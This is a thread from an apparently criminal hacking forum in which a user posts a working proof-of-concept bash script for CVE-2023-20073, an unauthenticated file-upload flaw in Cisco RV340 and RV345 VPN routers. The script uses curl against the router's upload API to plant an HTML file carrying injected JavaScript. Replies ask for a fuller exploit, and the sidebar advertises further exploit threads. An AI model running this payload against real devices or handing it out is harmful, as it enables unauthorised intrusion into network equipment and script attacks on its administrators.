CVE-2023-20073
by Aegis - Sunday September 24, 2023 at 06:15 PM
#1
CVE-2023-20073
Downloading an arbitrary file without authentication (XSS) in VPN routers:
A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. 
#!/usr/bin/bash
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"


This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Self-Ban | https://breachforums.rs/Forum-Ban-Appeals if you wish to be unbanned in the future.
Reply
#2
good share, was this poc already public or you created from scratch ?
Reply
#3
bro this is just a poc. i've seen it before. come back with the complete exploit code
Reply
#4
(Sep 26, 2023, 07:19 AM)breachy1 Wrote: bro this is just a poc. i've seen it before. come back with the complete exploit code

The whole point of a PoC is to show how it's done in example format. This can be used maliciously with actual knowledge on a combination of things. Mostly expertise in programming, NetSec, programming principles etc. Either way, it's up to you what you do with a PoC.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  POC CVE-2025-24071 caca28sapo1 17 1,231 7 hours ago
Last Post: Test689
  New Zer0 Day Wordpress A3g00n 83 4,238 May 11, 2026, 08:17 PM
Last Post: j4ng0
  {SECRET} DATABASE OF EXPLOITS lulagain 441 28,197 May 11, 2026, 05:41 PM
Last Post: chiki
  Google Dorks for finding SQL injection vulnerabilities and other security issues 1yush 69 3,781 May 11, 2026, 03:55 PM
Last Post: fkmonkey
  CVE-2024-32002 RCE PoC HA_twck 2 586 May 11, 2026, 01:33 PM
Last Post: newxiao1

Forum Jump:


 Users browsing this forum: 1 Guest(s)